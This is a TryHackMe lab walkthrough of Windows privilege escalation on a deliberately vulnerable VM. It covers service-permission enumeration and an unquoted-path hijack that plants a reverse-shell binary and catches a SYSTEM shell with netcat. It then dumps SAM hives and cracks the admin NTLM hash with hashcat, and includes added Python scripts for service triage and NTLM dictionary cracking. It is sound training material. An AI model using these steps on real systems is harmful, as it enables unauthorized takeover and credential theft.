Windows PrivEsc
- 🌐 Website: TryHackMe
- 🔥 Level: Medium
- 🖥️ OS: Windows
- 🔗 Link: Windows PrivEsc
Description
This room is aimed at walking you through a variety of Windows Privilege Escalation techniques. To do this, you must first deploy an intentionally vulnerable Windows VM. This VM was created by Sagi Shahar as part of his local privilege escalation workshop but has been updated by Tib3rius as part of his Windows Privilege Escalation for OSCP and Beyond! course on Udemy. Full explanations of the various techniques used in this room are available there, along with demos and tips for finding privilege escalations in Windows.
Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Windows VM!
RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321":
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.184.79
The next tasks will walk you through different privilege escalation techniques. After each technique, you should have an admin or SYSTEM shell. Remember to exit out of the shell and/or re-establish a session as the "user" account before starting the next task!
We have these credentials: user:password321
❓Question
What is the original BINARY_PATH_NAME of the daclsvc service?
📋 Walkthrough
First check which rights the current user holds over the service with accesschk, then read the service configuration with sc qc. The accesschk output shows that user has SERVICE_CHANGE_CONFIG, which is enough to rewrite the service's binary path (which is why the question asks for the original one), and sc qc shows the service runs as LocalSystem.
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\PrivEsc>sc qc daclsvc
sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\PrivEsc>
Answer
C:\Program Files\DACL Service\daclservice.exe
❓Question
What is the BINARY_PATH_NAME of the unquotedsvc service?
📋 Walkthrough
C:\PrivEsc>sc qc unquotedsvc
sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The image path is unquoted and contains spaces, so when the service starts, Windows resolves the executable by trying each space-delimited prefix with .exe appended (C:\Program.exe, C:\Program Files\Unquoted.exe, C:\Program Files\Unquoted Path.exe, C:\Program Files\Unquoted Path Service\Common.exe) before reaching the real binary. The directory C:\Program Files\Unquoted Path Service\ is writable by user (the copy below succeeds), so copy the reverse-shell payload already staged in C:\PrivEsc there as Common.exe, start a listener on Kali, and start the service; the payload then runs as LocalSystem:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvc
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ sudo nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.1.152] from (UNKNOWN) [10.10.174.230] 49724
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Answer
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
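The service triage used in the two tasks above (reading accesschk rights, then working out which files an unquoted image path makes Windows look for) as a worked example in Python. This is added code, not part of the room or of this walkthrough; the accesschk and sc qc texts are constructed samples copied from the output shown above, CONFIG_RIGHTS is my own list of the rights that allow reconfiguring a service, and the writable-directory check only means something when the script is run on the Windows target itself.

```python
"""Service misconfiguration triage: dangerous service rights and unquoted image paths.
Added example for this walkthrough, not code from the room. The sample inputs are the
accesschk / sc qc outputs shown in the walkthrough, pasted as constructed strings."""
import ntpath
import os
import re

# Constructed sample: output of `accesschk.exe -uwcqv user daclsvc` from the walkthrough.
ACCESSCHK_DACLSVC = """
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
"""

# Constructed samples: the two `sc qc` outputs from the walkthrough.
SC_QC_UNQUOTEDSVC = r"""
SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        SERVICE_START_NAME : LocalSystem
"""
SC_QC_DACLSVC = r"""
SERVICE_NAME: daclsvc
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        SERVICE_START_NAME : LocalSystem
"""

# Rights that let the caller rewrite the service configuration (binary path, account)
# or its security descriptor; any one of them is enough to take the service over.
CONFIG_RIGHTS = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
                 "WRITE_DAC", "WRITE_OWNER", "GENERIC_WRITE", "GENERIC_ALL"}


def dangerous_rights(accesschk_output: str) -> set:
    """Rights listed by accesschk (indented lines) that allow reconfiguring the service."""
    granted = set(re.findall(r"^\s+([A-Z_]+)\s*$", accesschk_output, re.M))
    return granted & CONFIG_RIGHTS


def field(sc_qc_output: str, name: str) -> str:
    """Value of one `NAME : value` line from sc qc output (quotes preserved)."""
    m = re.search(rf"{name}\s*:\s*(.*)", sc_qc_output)
    if m is None:
        raise ValueError(f"{name} not found in sc qc output")
    return m.group(1).strip()


def hijack_candidates(image_path: str) -> list:
    """Executables CreateProcess tries, in order, before the real one when the image
    path is unquoted and contains spaces: every space-delimited prefix, with .exe
    appended when the prefix has no .exe extension. A quoted path yields none."""
    if image_path.startswith('"'):
        return []
    words = image_path.split(" ")
    out = []
    for n in range(1, len(words)):
        prefix = " ".join(words[:n])
        out.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return out


def triage(sc_qc_output: str) -> dict:
    """Summarise one service: who it runs as, and where a planted binary would be picked up."""
    path = field(sc_qc_output, "BINARY_PATH_NAME")
    cands = hijack_candidates(path)
    return {
        "service": field(sc_qc_output, "SERVICE_NAME"),
        "runs_as": field(sc_qc_output, "SERVICE_START_NAME"),
        "unquoted_with_spaces": bool(cands),
        "candidates": cands,
        # Only meaningful on the target: which candidate directories can this user write to?
        "writable_dirs": [ntpath.dirname(c) for c in cands
                          if os.access(ntpath.dirname(c), os.W_OK)],
    }


if __name__ == "__main__":
    print("daclsvc rights of interest:", dangerous_rights(ACCESSCHK_DACLSVC))
    for svc in (SC_QC_DACLSVC, SC_QC_UNQUOTEDSVC):
        print(triage(svc))
```

Run on the target, the "writable_dirs" entry tells you which of the four candidates you can actually plant; in this VM it is the service's own directory, which is why the payload goes in as Common.exe rather than C:\Program.exe.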
❓Question
What is the NTLM hash of the admin user?
📋 Walkthrough
The live SAM hive under C:\Windows\System32\config is locked while Windows is running, but this VM keeps readable backup copies of the SAM and SYSTEM hives in C:\Windows\Repair. Copy both files to the Kali box and dump the hashes with creddump7's pwdump.py (SYSTEM hive first, then SAM):
┌──(kali㉿kali)-[/usr/share/creddump7]
└─$ python3 pwdump.py /home/kali/Desktop/THM/SYSTEM /home/kali/Desktop/THM/SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ echo "admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::"> hash
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 6 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
a9fdfa038c4b75ebc76dc855dd74f0da:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: a9fdfa038c4b75ebc76dc855dd74f0da
Time.Started.....: Sat Mar 29 19:51:49 2025 (1 sec)
Time.Estimated...: Sat Mar 29 19:51:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5616.2 kH/s (0.62ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> 280789
Hardware.Mon.#1..: Temp: 37c Util: 5%
Started: Sat Mar 29 19:51:49 2025
Stopped: Sat Mar 29 19:51:51 2025
admin:password123
Answer
a9fdfa038c4b75ebc76dc855dd74f0da
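The dump-and-crack step above as an added example (my code, not the room's or creddump7's): a pure-Python NT hash (MD4 over the UTF-16LE password) that reproduces the empty-password hash on the Guest and DefaultAccount lines and the admin hash hashcat recovered, plus the same dictionary check hashcat -m 1000 performs, run over a constructed wordlist. MD4 is implemented inline because hashlib.new("md4") is unavailable on OpenSSL 3 builds without the legacy provider; the two dump lines and the wordlist are constructed samples taken from the output above.

```python
"""NTLM (NT hash) reconstruction and offline dictionary check.
Added example for this walkthrough, not the room's code. MD4 is implemented here
because hashlib.new("md4") is unavailable on OpenSSL 3 builds without the legacy
provider. The pwdump lines and the wordlist below are constructed samples."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(message: bytes) -> bytes:
    """MD4 per RFC 1320: pad to 56 mod 64, append the bit length, then three
    16-step rounds per 64-byte block."""
    msg = message + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(message) * 8)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: sequential words, no constant
            a = _rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: column order 0,4,8,12,1,5,..., constant sqrt(2)
            a = _rotl((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: bit-reversed order, constant sqrt(3)
            a = _rotl((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & MASK,
                      (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def ntlm_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex. No salt and no iterations: the same
    password always gives the same hash, which is why a plain wordlist works."""
    return md4(password.encode("utf-16-le")).hex()


# The LM half on every dump line: LM hashing is disabled, so it is the fixed "empty" value.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def parse_pwdump_line(line: str) -> dict:
    """Split a pwdump-format line user:rid:lm:nt::: and flag the trivial cases."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_disabled": lm == EMPTY_LM,
            "blank_password": nt == ntlm_hash("")}


def crack(nt_hex: str, wordlist):
    """Dictionary attack: hash each candidate and compare, what hashcat -m 1000 does at scale."""
    target = nt_hex.lower()
    for candidate in wordlist:
        if ntlm_hash(candidate) == target:
            return candidate
    return None


# Constructed samples: two lines from the dump above and a three-word wordlist.
DUMP = [
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::",
]
WORDLIST = ["123456", "password", "password123"]

if __name__ == "__main__":
    for line in DUMP:
        rec = parse_pwdump_line(line)
        print(rec["user"], "blank password" if rec["blank_password"]
              else crack(rec["nt"], WORDLIST))
```

The Guest and DefaultAccount hashes above are exactly MD4 of the empty string, so those accounts need no cracking at all, and the identical aad3b435... LM field on every line confirms LM storage is off; only the NT hash matters for pass-the-hash or offline cracking.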